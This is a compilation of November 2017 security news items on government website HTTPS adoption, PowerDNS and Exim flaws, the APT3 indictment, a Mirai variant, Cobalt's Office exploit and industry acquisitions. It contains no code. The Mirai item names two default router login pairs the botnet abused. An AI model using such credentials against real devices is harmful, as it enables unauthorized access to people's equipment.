Security of U.S. Government Sites Improved Only Slightly: Report
28.11.2017 securityweek BigBrothers
The security of websites owned by the United States government has improved only slightly in the past months, according to a report published on Monday by the Information Technology and Innovation Foundation (ITIF).

ITIF has analyzed nearly 300 of the most visited U.S. government websites to see if they are fast, secure, mobile friendly, and accessible for users with disabilities. In terms of security, the study focused on whether these sites use HTTPS, DNSSEC, and if they are affected by known vulnerabilities.

According to ITIF, of the government websites included in the top 100,000 of the Majestic Million ranking, 75% use HTTPS, which encrypts communications between the user’s browser and the site. This represents a 3% decrease compared to data from a report published by the organization in March. However, overall, the percentage of government sites that have properly implemented SSL has increased from 67% to 71%.

Of the 260 sites tested for both reports, 31% showed improvement in SSL deployment, while 14% were less secure.

SSL score of federal websites

The U.S. Department of Homeland Security (DHS) recently ordered all federal agencies to start using web and email security technologies such as HTTPS, DMARC and STARTTLS within the next few months.

ITIF’s report shows that 8% of websites have not implemented HTTPS at all, but this is still an improvement compared to the 14% from the previous report. The Department of Defense (defense.gov) is one of the agencies that recently rolled out HTTPS, and the International Trade Administration (trade.gov) is among those that still lack the security feature.

SSL tests, conducted by ITIF using Qualys’ SSL Server Test, also showed that some government websites have important vulnerabilities. For example, the Trade Representative (ustr.gov) and National Weather Service (weather.gov) sites are vulnerable to POODLE attacks, and trade.gov and tsunami.gov (Tsunami Warning Centers) are susceptible to DROWN attacks.

As for DNSSEC, the protocol designed to prevent attackers from redirecting users to malicious sites via DNS spoofing, ITIF found that 90% of U.S. government websites have it enabled. Since the previous report, 15 federal sites activated DNSSEC and two deactivated the feature.

“Of the top 100,000 websites reviewed only 70 percent passed both the DNSSEC and SSL test. Several of these top 100,000 websites did not have DNSSEC or HTTPS implemented. One example is the Administrative Office of the U.S. Courts (uscourts.gov), which also scored low in the security category in the initial report,” ITIF said in its 2017-benchmarking-us-government-websites.

Shortly after the DHS ordered federal agencies to improve their security, Agari analyzed government websites to see how many had implemented the DMARC anti-email spoofing protocol. In mid-October when the company published its report, nearly 82% of websites lacked DMARC entirely.


Trend Micro Acquires Application Security Firm Immunio
28.11.2017 securityweek IT
Cybersecurity firm Trend Micro announced on Tuesday that it has acquired Montréal, Canada-based web application security firm Immunio for an undisclosed sum.

The acquisition, Trend Micro says, will help increase the automated protection that it can provide customers throughout the DevOps lifecycle.

“We are excited to acquire Immunio’s application protection technology, their team of application security experts and their customers,” said Bill McGee, SVP and GM of Hybrid Cloud Security at Trend Micro. “Technology changes, like cloud computing and container platforms, are enabling faster application development. Immunio’s run-time application security allows our customers to increase protection against software vulnerabilities within the applications they are building.”

Announced at the AWS re:Invent conference this week, Trend Micro also said that it is enhancing its container-specific security capabilities, by supporting container image scanning, which allows security issues to be identified and resolved prior to production release.

According to Trend, the new capabilities integrated with the DevOps lifecycle, with Immunio bringing early detection and protection against application vulnerabilities, and container image scanning allowing for the publishing and protection of secure container images.

In March 2016, Trend Micro acquired the TippingPoint network security portfolio from Hewlett Packard Enterprise (HPE) for $300 million.


Majority of Android Apps Contain Embedded User-Tracking: Report
28.11.2017 securityweek Android
Seventy-five percent of 300 Android apps tested by Exodus Privacy and analyzed by the Yale Privacy Lab contain embedded trackers, including Uber, Tinder, Skype, Twitter, Spotify and Snapchat. The trackers are primarily used for targeted advertising, behavioral analytics and location tracking. They come as part of the app, and their presence and operation is likely unknown to the user at the time of installation.

Details are published in an analysis by the Yale Privacy Lab. It looked at 25 of the 44 trackers known to the French non-profit Exodus Privacy. Exodus analyzed 300 apps using its app scanning platform. According to its own research, the five most common embedded trackers are CrashLytics, DoubleClick, Localytics, Flurry and HockeyApp.

Despite this high number of trackers located by the research, Privacy Lab fears the problem could be worse. "The Exodus platform identifies trackers via signatures, like an anti-virus or spyware scanner, and thus can only detect trackers previously identified by researchers at the time of the scan." It fears that trackers can be added to apps in software updates after installation, and that new trackers will simply not yet be identified by Exodus.

It also adds, "Tracker companies openly advertise Software Development Kits (SDKs) compatible with multiple platforms. Thus, advertising trackers may be concurrently packaged for Android and iOS, as well as more obscure mobile platforms."

The analysis from Privacy Lab provides two examples that demonstrate its concern. Fidzup claims it has developed communication between a sonic emitter and a mobile phone. By diffusing a tone, inaudible to the human ear, inside a building Fidzup can detect the presence of mobile phones and therefore their owners. "Users installing 'Bottin Gourmand', a guide to restaurants and hotels in France," warns Privacy Lab, "would thus have their physical location tracked via retail outlet speakers as they move around Paris. Their experience would be shared by readers of car magazine app 'Auto Journal' and TV guide app 'TeleStar'."

This type of technology has probably been replaced by simple WiFi tracking; but, warns the research, closely resembles the practices of Teemo and SafeGraph. Teemo was embroiled in scandal earlier this year for studying the geolocation of 10 million French citizens, and SafeGraph, who collected 17 trillion location markers for 10 million smartphones during [Thanksgiving] last year.

However, the organization is particularly concerned about the use of trackers on the finances and healthcare of users. It cites Mon AXA, developed by a multinational insurance and finance firm, and found by Exodus to contain six trackers. Privacy Lab does not know what information is shared by these trackers. Other AXA apps, including 'HealthLook', 'AXA Banque', and 'My Doctor' also contain trackers.

Other health and finance apps that contain trackers include those from Aetna, the American Red Cross, WebMD, American Express, Discover, HSBC, Wells Fargo, and PayPal.

Privacy Lab is calling for greater transparency from Google over privacy and security practices for trackers. "Android users, and users of all app stores, deserve a trusted chain of software development, distribution, and installation that does not include unknown or masked third-party code."


Several Vulnerabilities Patched in PowerDNS
28.11.2017 securityweek Vulnerebility
Updates released for the authoritative nameserver and recursive nameserver components of PowerDNS patch several vulnerabilities that can be exploited for denial-of-service (DoS) attacks, records manipulation, modifying configurations, and cross-site scripting (XSS) attacks.

PowerDNS Recursor versions 4.0.0 through 4.0.6 are affected by a DNSSEC validation issue that can be exploited by a man-in-the-middle (MitM) attacker to forge signatures and alter DNS records (CVE-2017-15090).

Another flaw affecting these versions of Recursor is CVE-2017-15092, an XSS bug that allows a remote attacker to inject arbitrary HTML and JavaScript code into the Recursor web interface. The security hole can be exploited by sending specially crafted DNS queries to the server in order to alter the web interface or cause it to enter a DoS condition.

The Recursor is also impacted by a vulnerability that allows an authenticated attacker to inject new directives into its configuration (CVE-2017-15093). The last issue affecting this component is a DoS flaw caused by a memory leak that can occur when parsing specially crafted DNSSEC ECDSA keys (CVE-2017-15094). The vulnerability can be exploited by using an authoritative server to send specially crafted keys to the recursor.

The only security hole affecting PowerDNS Authoritative versions 4.0.4, 3.4.11 and prior is CVE-2017-15091, which allows an authenticated attacker to cause a DoS condition.

The vulnerabilities have been rated medium and low severity as they do not impact default configurations. Patches are included in PowerDNS Authoritative 4.0.5 and Recursor 4.0.7. Minimal fixes have also been provided for the 3.4.11 and 3.7.4 releases, but users of these versions have been advised to migrate to the 4.x branch.

These security holes were discovered by Finland-based cybersecurity services company Nixu during a source code audit, Chris Navarrete of Fortinet's Fortiguard Labs, Kees Monshouwer, and a researcher who uses the online moniker “everyman.”


U.S. Indicts Chinese For Hacking Siemens, Moody’s
28.11.2017 securityweek BigBrothers
U.S. authorities filed charges Monday against three China-based hackers for stealing sensitive information from U.S. based companies, including data from Siemens industrial groups and accessing a high-profile email account at Moody’s.

Wu Yingzhuo, Dong Hao and Xia Lei, who the Department of Justice (DOJ) says are Chinese nationals and residents of China, were indicted by a grand jury for a series of cyber-attacks against three corporate victims in the financial, engineering and technology industries between 2011 and May 2017.

Victims named in the indictment include Moody’s Analytics, Siemens, and GPS technology firm Trimble.

According to the FBI, the hackers work for Guangzhou Bo Yu Information Technology Company Limited, a firm that purports to be a China-based Internet security firm also known as “Boyusec.”

Tracked as APT3 by FireEye, and Gothic Panda by CrowdStrike, the group is also known as UPS Team, Buckeye and TG-0110, and has previously been linked to the Chinese Ministry of State Security (MSS).

“We’ve tracked their activity back to 2007 and they are one of the most technically advanced state-affiliated actors in China,” Adam Meyers, VP of Intelligence at CrowdStrike, told SecurityWeek. “Their previous targeting includes industries such as Aerospace, Defense, Energy, Technology, NGOs, etc., that are primarily aligned with China’s economic objectives.”

In November 2016, the Washington Free Beacon learned from Pentagon intelligence officials that Boyusec had been working with Chinese telecoms giant Huawei to develop spyware-laden security products that would be loaded onto computers and phones. The unnamed officials said Boyusec was “closely connected” to the Chinese Ministry of State Security.

According to the indictment, the hackers:

• Stole approximately 407 gigabytes of proprietary commercial data pertaining to Siemens’s energy, technology and transportation businesses.

• Accessed the internal email server of Moody’s Analytics and placed a forwarding rule in the email account of a prominent employee, and set it to forward all emails to and from the account to web-based email accounts controlled by the attackers.

• Stole at least 275 megabytes of data, including compressed data, which included hundreds of files that would have assisted a Trimble competitor in developing, providing and marketing a similar product without incurring millions of dollars in research and development costs.

“The primary goal of the co-conspirators’ unauthorized access to victim computers was to search for, identify, copy, package, and steal data from those computers, including confidential business and commercial information, work product, and sensitive victim employee information, such as usernames and passwords that could be used to extend unauthorized access within the victim systems,” the DOJ said. “For the three victim entities listed in the Indictment, such information included hundreds of gigabytes of data regarding the housing finance, energy, technology, transportation, construction, land survey, and agricultural sectors.”

Intrusion Truth previously conducted an analysis of APT3’s command and control (C&C) infrastructure, and analyzed domain registration data. Their research led to two individuals, named Wu Yingzhuo and Dong Hao, who apparently registered many of the domains used by the threat actor.

Researchers noticed last year that the group had shifted its attention from the U.S. and the U.K. to Hong Kong, where it had mainly targeted political entities using a backdoor dubbed “Pirpi.”

CrowdStrike has seen an uptick in activity by the group since 2016, Meyers said.

In addition to Pirpi, Symantec observed APT3 using various other tools, including keyloggers, remote command execution tools, system information harvesting tools, and browser password stealers. Researchers said the group appears to be focusing on file and print servers, which suggests they are mainly interested in stealing documents to support their espionage efforts.

“Defendants Wu, Dong and Xia launched coordinated and targeted cyber intrusions against businesses operating in the United States, including here in the Western District of Pennsylvania, in order to steal confidential business information,” said Acting U.S. Attorney Song. “These conspirators masked their criminal conspiracy by exploiting unwitting computers, called ‘hop points,’ conducting ‘spearphish’ email campaigns to gain unauthorized access to corporate computers, and deploying malicious code to infiltrate the victim computer networks.”


New Mirai Variant Emerges
28.11.2017 securityweek BotNet
A new variant of the Mirai malware has been observed over the past week targeting new sets of default credentials specific to ZyXEL devices, Qihoo 360 Netlab researchers warn.

Mirai became widely known about a year ago, when it started ensnaring insecure Internet of Things (IoT) devices into a botnet capable of launching massive distributed denial-of-service (DDoS) attacks. With its source code made public in early October 2016, Mirai had already infected devices in 164 countries by the end of that month.

To spread, Mirai scans the Internet for open ports associated with Telnet access on Internet-facing IoT products and attempts to connect to the discovered devices using a set of default username/password combinations.

In August this year, Akamai explained that Mirai is formed of smaller hives of related bots and command and control (C&C) servers, and parts of it can be used for different purposes. Thus, the botnet can be involved in multiple, simultaneous attacks, each orchestrated from a different C&C, likely by a different operator, and can also be rented to wannabe criminals.

“At least one botnet operator was offering access to the systems under its control for rent,” Akamai revealed.

Starting with last week, Netlab observed an increase in port 2323 and 23 scan traffic and “confidently” associated it with a new Mirai variant. The researchers also discovered that this new malware version is specifically searching for insecure ZyXEL devices.

According to the security researchers, the scanner was attempting to exploit two new default login credentials, namely admin/CentryL1nk and admin/QwestM0dem. The former, they explain, was first spotted less than a month ago in exploit-db, as part of an exploit targeting the ZyXEL PK5001Z modem.

What Netlab noticed was that the abuse of the two login credentials started on November 22 and reached its peak the next day, the same as the uptick on port 2323 and 23 scan traffic. Thus, they concluded that the two were related.

The security researchers also reveal that most of the scanner IPs appear to be located in Argentina, with nearly 100,000 unique scanners from that country observed over a period of nearly three days. This led them to conclude that the attack might have been focused on specific types of IoT devices widely deployed in Argentina.

Last year, the Mirai worm was involved in a similar attack where nearly 1 million of Deutsche Telekom’s fixed-line network customers experienced Internet disruptions.


Critical Code Execution Flaw Found in Exim
28.11.2017 securityweek Vulnerebility
Serious vulnerabilities that can be exploited for remote code execution and denial-of-service (DoS) attacks have been found in the popular mail transfer agent (MTA) software Exim.

Exim is an open source MTA for Unix systems created at the University of Cambridge. An analysis of more than one million mail servers conducted back in March showed that over 56 percent of them had been running Exim.

A researcher who uses the online moniker “Meh,” a member of the research team at Taiwan-based security firm DEVCORE, discovered that Exim is affected by a couple of potentially serious vulnerabilities.

One of them, tracked as CVE-2017-16943 and classified as critical, is a use-after-free bug related to a feature called “chunking.” It allows a remote attacker to execute arbitrary code or cause a DoS condition via specially crafted BDAT commands.

Chunking is a feature that allows sending emails in chunks. BDAT commands specify the length of the binary data packet so that the Simple Mail Transfer Protocol (SMTP) host does not have to continuously scan for the end of the data.

Sending specially crafted BDAT commands to the targeted mail server can trigger the use-after-free vulnerability and allow an attacker to execute arbitrary code. There are reportedly more than 400,000 servers with the vulnerable chunking feature visible on the Internet.

The second flaw discovered by Meh is CVE-2017-16944, a high severity issue that allows a remote attacker to cause a DoS condition using specially crafted BDAT commands.

In the advisory informing Exim users of the vulnerability, developers said the issue had been disclosed publicly before a patch could be released. Meh said he did not find an email address for privately reporting security holes so he reported it via the Exim bug tracker. However, the bug tracker did not have an option for setting reports to private and the researcher wrongly assumed that security bugs are set to private by default. Exim developers have taken steps to prevent such incidents in the future.

The details of the code execution vulnerability, along with proof-of concept (PoC) code, were posted to the Exim Bugzilla on November 23. A workaround that involves disabling the chunking feature and a patch were made available within two days. Only the source code patch is available – the fix for CVE-2017-16943 will likely be included in the next release.

Exim is currently at version 4.89 and the flaw was apparently introduced in 4.88 when the chunking feature was added. Developers are still working on a patch for CVE-2017-16944.

Just over a dozen vulnerabilities have been identified in Exim since 2010, and only five of them, reported several years ago, allow remote code execution without authentication.


McAfee to Acquire CASB Firm Skyhigh Networks
28.11.2017 securityweek IT
McAfee announced on Monday that it has agreed to acquire cloud access security broker (CASB) Skyhigh Networks for an undisclosed amount.

CASBs are the go-to solution for corporate cloud security. By controlling access to the corporate cloud they can apply visibility and security to what is within that cloud. But it is such a good solution that big security firms are rapidly buying up all the independent CASBs (such as Microsoft, Symantec, Forcepoint, Oracle, and Cisco).

It's reaching the stage where no large security firm can be without a CASB, and no CASB can survive and prosper without the support of a major security vendor.

"Skyhigh Networks had the foresight five years ago to realize that cybersecurity for cloud environments could not be an impediment to, or afterthought of, cloud adoption," said McAfee CEO Chris Young stated. "They pioneered an entirely new product category called cloud access security broker (CASB) that analysts describe as one of the fastest growing areas of information security investments of the last five years -- where Skyhigh continues to innovate and lead. Skyhigh's leadership in cloud security, combined with McAfee's security portfolio strength, will set the company apart in helping organizations operate freely and securely to reach their full potential."

Little about the mechanics of the agreement have been announced, beyond a statement that Skyhigh CEO "Rajiv Gupta will join McAfee CEO Chris Young's leadership team to run McAfee's new cloud business unit." However, both CEOs have provided a little more information in separate blogs.

"Combined with McAfee's endpoint security capabilities and operations center solutions with actionable threat intelligence, analytics and orchestration, we will be able to deliver a set of end-to-end security capabilities unique in the industry," writes Gupta.

"Cloud security has historically been an afterthought of, or impediment to, cloud adoption. With customers' most valuable asset, data, increasingly finding residence in the cloud, it's time security move to the forefront. At the same time, security cannot hinder cloud adoption, as the transformation the cloud promises extends far beyond the corridors of IT to every facet of modern business. Skyhigh had this prescience five years ago," wrote Young.

The combination of the two companies, with McAfee's traditional strength in endpoint security and a growing network security portfolio with Skyhigh's cloud security, should clearly benefit both organizations. "McAfee already claims a market-leading position in endpoint. With Skyhigh's leadership in securing the world's most valuable asset -- data -- in the cloud, the company sets itself apart," announces an associated Skyhigh FAQ.

But there is no information yet on how the products will work together -- just a placeholder from Skyhigh: "How will Skyhigh and McAfee's products work together? We have some exciting things in the works that we'll share over the coming months. Stay tuned!" If McAfee stays true to its stated intents, this will include bringing greater automation and orchestration to the cloud and associated endpoints.

McAfee separated from Intel in April 2017.


Thoma Bravo Acquires Barracuda Networks for $1.6 Billion
28.11.2017 securityweek IT
Private equity investment firm Thoma Bravo has entered an agreement to acquire security company Barracuda Networks for $1.6 billion in cash.

Barracuda shareholders will receive $27.55 for each share of common stock they hold, which exceeds the average stock price of $22.49 for the ten days leading up to November 27 by more than 22 percent.

The agreement was unanimously approved by Barracuda’s board of directors. Once the acquisition is completed – likely before the fiscal year ends on February 28, 2018 – Barracuda will operate as a privately-held company and it will continue to focus on email security and management, data protection, and network and application security solutions for cloud and hybrid environments.Barracuda acquired by Thoma Bravo

“We believe the proposed transaction offers an opportunity for us to accelerate our growth with our industry-leading security platform that's purpose-built for highly distributed, diverse cloud and hybrid environments. We will continue Barracuda's tradition of delivering easy-to-use, full-featured solutions that can be deployed in the way that makes sense for our customers,” said BJ Jenkins, CEO of Barracuda.

“Thoma Bravo has an excellent history of investing in growing security businesses, and this transaction speaks to the value and strength of Barracuda's security platform, which helps customers protect and manage their networks, applications, and data. I expect that our employees, customers, and partners will benefit from this partnership,” he added.

The news comes just weeks after Barracuda announced the acquisition of public cloud archiving and business insights provider Sonian in an effort to enhance the company’s email security and management capabilities.

Barracuda’s latest financial report shows that the company’s revenue in the second fiscal quarter grew 7% year-over-year to $94.3 million, and the number of active subscribers increased by 17% to nearly 350,000.


Cobalt Hackers Exploit 17-Year-Old Vulnerability in Microsoft Office
28.11.2017 securityweek Vulnerebility
The notorious Cobalt hacking group has started to exploit a 17-year-old vulnerability in Microsoft Office that was addressed earlier this month, security researchers claim.

Fixed in Microsoft's November 2017 Patch Tuesday security updates and found by Embedi security researchers in the Microsoft Equation Editor (EQNEDT32.EXE), the bug is identified as CVE-2017-11882.

The issue was found in a component that remained unchanged in Microsoft’s Office suite since November 9, 2000, and appears to have been patched manually instead of being corrected directly in the source code, an analysis 0patch published last week reveals.

An Office component designed to facilitate the creation of math and science equations, the Equation Editor was replaced in Office 2007 with new methods of displaying and editing equations. However, the old tool continues to be part of the popular Office suite to ensure compatibility with older documents.

The newly addressed vulnerability has recently started being exploited by the Cobalt hackers in live attacks, ReversingLabs, which managed to capture a RTF document specifically designed to exploit CVE-2017-11882, says.

The malicious file was observed contacting a remote server to grab a first-stage payload it would execute using MSHTA.exe. The executed code would then connect to the remote server to fetch a second-stage payload, a script that would drop an embedded, final payload.

This appears to be the Cobalt Strike backdoor, the group’s preferred malicious tool. The malware allows the attackers to execute remote commands on the infected systems.

Considering that unpatched EQNEDT32.EXE instances put Office users at risk, regardless of the Windows version their systems run. The 17 year-old bug was found to impact even machines running Windows 10 Creators Update, which explains why hackers are already exploiting the vulnerability.

What’s more, proof-of-concept exploits for the vulnerability were published soon after the vulnerability became public, so there’s no surprise in the fact that Cobalt has already started targeting the bug, especially since the hacking group is known to be a fast adopter of newly discovered exploits.

A financially-motivated group, Cobalt was first described in 2016 and is known to be targeting banks, financial exchanges, insurance companies, investment funds, and other financial organizations. The hackers use phishing emails carrying malicious documents or ZIP archives packing executables to distribute their malware.

Earlier this year, the group started abusing CVE-2017-0199, a vulnerability patched in April, expanded its operations to North America, and started using supply chain attacks. The group was initially focused only on Eastern Europe and Central and Southeast Asia, but is now hitting targets worldwide.

A report published last week revealed that the group started targeting banks themselves, instead of bank customers. The attacks were attempting to exploit CVE-2017-8759, a code injection/remote code execution vulnerability in Microsoft’s .NET Framework that was patched in September 2016.


Op In Our Sites – Europol and other agencies seize over 20,500 domains for selling counterfeit products
28.11.2017 securityaffairs CyberCrime

An joint operation conducted by Europol and other law enforcement agencies resulted in the seizure of more than 20,520 domains for selling counterfeit products.
The operation, dubbed “In Our Sites (Project TransAtlantic VIII),” allowed to seize domains that were offering for sale any kind of counterfeit product, including luxury products, sportswear, electronics, pharmaceuticals and online piracy on e-commerce platforms and social networks.

This is the eighth edition of this global operation against online counterfeiting and IP crimes.

Europol

@Europol
Biggest hit against online piracy: Over 20520 domain names seized for illegally selling counterfeit goods to consumers, incl. luxury products, sportswear, electronics, pharmaceuticals & more. Europol @IPRCenter @DHSgov @ICEgov 💪 https://www.europol.europa.eu/newsroom/news/biggest-hit-against-online-piracy-over-20-520-internet-domain-names-seized-for-selling-counterfeit … #CyberMonday

3:28 PM - Nov 27, 2017
7 7 Replies 115 115 Retweets 156 156 likes
Twitter Ads info and privacy
The “In Our Sites (Project TransAtlantic VIII)” operation was conducted by the Europol in association with the Interpol, the US National Intellectual Property Rights Coordination Centre (NIPRCC), FBI, Department of Justice (DOJ), and law enforcement authorities from 27 European Member States.

An Intellectual Property (IP) crime is committed every time someone uses an intellectual property right without the owner’s authorization. According to the Europol, counterfeiting and piracy are the main categories of IP crimes, such kind of crimes is becoming one of the most profitable business for the Organised Crime Groups (OCGs) are increasingly involved in the violation of IPR and darknets have a key role in the criminal ecosystem.

According to the International Trademark Association around $460 billion worth of counterfeit goods were bought and sold in 2016.
“Targeting copyright-infringing websites that market dangerous counterfeit goods to consumers and engage in other forms of intellectual property theft will continue to be a priority for law enforcement,” said acting IPR Center Director Nick.

“Strengthening our collaboration with police authorities around the world and leaders of industry will reinforce the crackdown on IP crimes, and demonstrate that there is no safe haven for criminals committing these illicit activities.”

Europol hasn’t disclosed the list of seized domains that now display the official seals from the law enforcement agencies that participated in the operation.

Below the message presented by the visitors:

“This domain name has been seized

Operation in Our Sites-Project TransAtlantic VIII is a coordinated effort by the U.S., European, South American and Asian law enforcement agencies targeting websites and their operations that sell counterfeit goods.”

Europol Operation In Our Sites

“This excellent result shows how important and effective cooperation between law enforcement authorities and private-sector partners is, and how vital it is if we are to ultimately make the internet a safer place for consumers. Through its Intellectual Property Crime Coordinated Coalition (IPC³), Europol will continue to work closely with its partners to strengthen the fight against intellectual property crime online and offline.’’ said Rob Wainwright, Executive Director of Europol.

According to data published by the Europol, the agency has seized a total of 7,776 websites in previous “In Our Sites” (IOS) editions.

“A total of 7776 websites have been seized in the previous editions. This year’s operation IOS VIII has seen a remarkable increase of up to 20 520 seized domain names that were illegally selling counterfeit merchandise online to consumers.” reads the press release issued by Europol. “This can be explained by the holistic approach which Europol followed with the aim of making the internet a safer place for consumers, by getting even more countries and private-sector partners to participate in this operation and provide referrals.”


The energy used to mine Bitcoin this year is bigger than the annual usage of almost 160 countries
28.11.2017 securityaffairs IT

According to PowerCompare.co.uk, the electricity used to mine Bitcoin this year is bigger than the annual usage of almost 160 countries.
While the price of cryptocurrencies such as the Bitcoin continues to increase the interest of investors and crooks in this new industry is demonstrated by disconcerting data that I’m going to share with you.

According to new research conducted by energy tariff comparison service PowerCompare.co.uk, the electricity used to mine Bitcoin this year is bigger than the annual usage of almost 160 countries. The energy consumption has already exceeded the amount used on average by states such as Ireland and most African nations.

“According to Digiconomist’s Bitcoin Energy Consumption Index, as of Monday November 20th, 2017 Bitcoin’s current estimated annual electricity consumption stands at 29.05TWh.” states the research.

“That’s the equivalent of 0.13% of total global electricity consumption. While that may not sound like a lot, it means Bitcoin mining is now using more electricity than 159 individual countries (as you can see from the map above). More than Ireland or Nigeria.”

Bitcoin transactions use so much energy that the electricity used for a single trade could power a home for almost a whole month, according to a paper from Dutch bank ING.

“By making sure that verifying transactions is a costly business, the integrity of the network can be preserved as long as benevolent nodes control a majority of computing power,” wrote ING senior economist Teunis Brosens.

“Together, they will dominate the verification (mining) process. To make the verification (mining) costly, the verification algorithm requires a lot of processing power and thus electricity.”

Comparing the amount of energy used for a Bitcoin transaction to run his home in the Netherlands, Brosens says: “This number needs some context. 200kWh is enough to run over 200 washing cycles. In fact, it’s enough to run my entire home over four weeks, which consumes about 45 kWh per week costing €39 of electricity (at current Dutch consumer prices).”

It is amazing if we compare this data other payment systems, for example Visa takes about 0.01kWh (10Wh) per transaction which is 20000 times less energy.

The following graph shows the 159 countries whose energy usage is less than bitcoin-mining consumption.

bitcoin mining electricity comsuption
Source PowerCompare.co.uk

Which is the concept behind the mining process?

To prevent the falsification of the records or the ownership changing, participants of the Bitcoin network must sign off on transactions in “blocks”.

The process requests a significant computational capability and involves several computers to solve complex cryptographic problems, people who verify blocks are rewarded with freshly created bitcoin. This process is known as Bitcoin “mining.”

According to the initial design of the Bitcoin virtual currency scheme, it limits the overall number of coins in circulation to 21 million, this is possible because the cryptographic problems involved in the mining process get progressively harder.

On the other side, miners are turning to more powerful computers to solve the complex problems behind the mining process.

The vast majority of “mining” activities is done in China because the energy costs are cheaper compared to Europe or US.

“The top six biggest mining pools from Antpool to BTCC are all largely based in China,” said Mati Greenspan, an analyst with trading platform eToro. “Some rough estimates put China’s hashpower at more than 80% of the total network.”

Of course, the environmental impact of all this electric usage is not negligible, don’t forget that the electricity generated in China comes from CO2 emitting fossil fuels.

Below a few other interesting facts about Bitcoin mining and electricity consumption published:

In the past month alone, Bitcoin mining electricity consumption is estimated to have increased by 29.98%
If it keeps increasing at this rate, Bitcoin mining will consume all the world’s electricity by February 2020.
Estimated annualised global mining revenues: $7.2 billion USD (£5.4 billion)
Estimated global mining costs: $1.5 billion USD (£1.1 billion)
Number of Americans who could be powered by bitcoin mining: 2.4 million (more than the population of Houston)
Number of Britons who could be powered by bitcoin mining: 6.1 million (more than the population of Birmingham, Leeds, Sheffield, Manchester, Bradford, Liverpool, Bristol, Croydon, Coventry, Leicester & Nottingham combined) Or Scotland, Wales or Northern Ireland.
Bitcoin Mining consumes more electricity than 12 US states (Alaska, Hawaii, Idaho, Maine, Montana, New Hampshire, New Mexico, North Dakota, Rhode Island, South Dakota, Vermont and Wyoming)


US indicts Chinese hackers belonging to APT3 for espionage on Siemens and Moody’s
28.11.2017 securityaffairs APT

US authorities have filed official charges against three Chinese hackers part of the elite cyber-espionage unit APT3.
US authorities charged three China-based hackers for stealing sensitive information from US based companies, including Siemens AG, and accessing a high-profile email account at Moody’s.

The three Chinese citizens, Wu Yingzhuo, Dong Hao and Xia Lei, work for the Chinese cybersecurity company Guangzhou Bo Yu Information Technology Company Limited, also known as “Boyusec.”

While Wu and Dong are founding members and shareholders of the China-based company, Xia is just an employee.

Do you remember the Boyusec name?

Several reports published in May 2017 linked the Boyusec firm to the infamous APT3 group, a cyber-espionage group under the control of the Chinese Government.

The APT3, also known as UPS, Gothic Panda, and TG-011, has been active since 2010.

APT3 China

On May 9th, 2017, an unknown party using the alias ‘intrusiontruth’ published a series of blogs posts describing connections between the Pirpi RAT command and control components and shareholders of the Chinese security contractor Guangzhou Boyu Information Technology Company, aka Boyusec.

The names of two specific shareholders of Boyusec appear in the domain registration for the Pirpi C&C servers. This is particularly interesting because Boyusec supports the Chinese Ministry of State Security (MSS) by collecting civilian human intelligence. Think of them as an outsourcer for a government agency like the United States’ National Security Agency (NSA).

Also interesting is that in 2016 a Pentagon report described the relationship between Boyusec and network equipment manufacturer, Huawei. According to the report, the two companies were colluding to develop security equipment with embedded backdoors which would likely be used by Boyusec to compromise Huawei customers.

“In November 2016, the Washington Free Beacon reported that a Pentagon internal intelligence report had exposed a product that Boyusec and Huawei were jointly producing.” continues the analysis.”According to the Pentagon’s report, the two companies were working together to produce security products, likely containing a backdoor, that would allow Chinese intelligence “to capture data and control computer and telecommunications equipment.” The article quotes government officials and analysts stating that Boyusec and the MSS are “closely connected,” and that Boyusec appears to be a cover company for the MSS.”

The Chinese men have been charged in Pittsburgh with using malware to steal data from the international corporations, including Siemens AG, which has Pittsburgh offices.

The federal indictment filed in September was unsealed Monday, the men were charged by a grand jury for cyber-attacks against three corporations in the financial, engineering and technology industries between 2011 and May 2017. Victims are Moody’s Analytics, Siemens, and GPS technology firm Trimble.

“The primary goal of the co-conspirators’ unauthorized access to victim computers was to search for, identify, copy, package, and steal data from those computers, including confidential business and commercial information, work product, and sensitive victim employee information, such as usernames and passwords that could be used to extend unauthorized access within the victim systems,” the DOJ said. “For the three victim entities listed in the Indictment, such information included hundreds of gigabytes of data regarding the housing finance, energy, technology, transportation, construction, land survey, and agricultural sectors.”

According to the indictment, the hackers:

• Stole approximately 407 gigabytes of proprietary commercial data pertaining to Siemens’s energy, technology and transportation businesses.

• Accessed the internal email server of Moody’s Analytics and placed a forwarding rule in the email account of a prominent employee, and set it to forward all emails to and from the account to web-based email accounts controlled by the attackers.

• Stole at least 275 megabytes of data, including compressed data, which included hundreds of files that would have assisted a Trimble competitor in developing, providing and marketing a similar product without incurring millions of dollars in research and development costs.

All three indicted suspects are still at large and currently residing in China.


CZ.NIC testuje veřejný honeypot, který pomůže s detekováním malwaru
27.11.2017 Lupa.cz Zabezpečení
Pomoc se zkoumáním útoků a odhalováním chyb, které útočníci zneužívají. To si sdružení CZ.NIC slibuje od projektu Honeypot as a Service (HaaS), který začalo testovat v říjnu. Projekt má umožnit koncovým uživatelům přesměrovat útoky na jejich zařízení do centrálního honeypotu, ve kterém je pak experti mohou analyzovat a získané údaje použít ke zvýšení zabezpečení.

Jak to funguje? Případný dobrovolný zájemce se zaregistruje na webu projektu a do svého PC (nebo na linuxový server) si stáhne a nainstaluje proxy. Zdrojový kód aplikace (haas-mitmproxy) je dostupný na GitHubu. Po spuštění na počítači začne proxy přeposílat příchozí komunikaci z portu 22 na server HaaS, na kterém honeypot Cowrie simuluje zařízení a zaznamenává provedené příkazy.

„Projekt HaaS zahrnuje vytvoření sítě minimálně pěti set koncových uživatelů a techniky pro přesměrování těchto uživatelů na centrální honeypot. Cílem našeho výzkumu je pak zajistit, aby byl útočník co nejdéle přesvědčen, že útočí na skutečný cíl, tedy na počítač, server nebo router, nikoliv honeypot,“ popisuje Ladislav Lhotka z CZ.NIC.

Projekt momentálně běží v betatestu a jeho ostré spuštění by mělo přijít někdy v květnu příštího roku. Částkou 1,3 milionu na něj přispěla Technologická agentura ČR.


Postřehy z bezpečnosti: ještě pochybujete o nutnosti HTTPS?
27.11.2017 Root.cz Bezpečnost
Dnes se podíváme na jednu kontroverzní oslavu státního svátku, prozkoumáme nový seznam zranitelností webových aplikací a připomeneme si zajímavý výrok ve vývojářské konferenci linuxového jádra.

Kontroverzní oslava 17. listopadu
Pokud jste nedávný státní svátek slavili off-line, možná vám unikl poměrně kontroverzní způsob, jakým se k jeho oslavě připojil operátor O2. Při pokusu o přístup na webovou stránku nekončící českou doménou bylo HTTP spojení uneseno a místo skutečné odpovědi podvrženo přesměrování na captive portál, představující fiktivní železnou oponu. Teprve po kliknutí na odkaz na něm bylo možné pokračovat normálně.

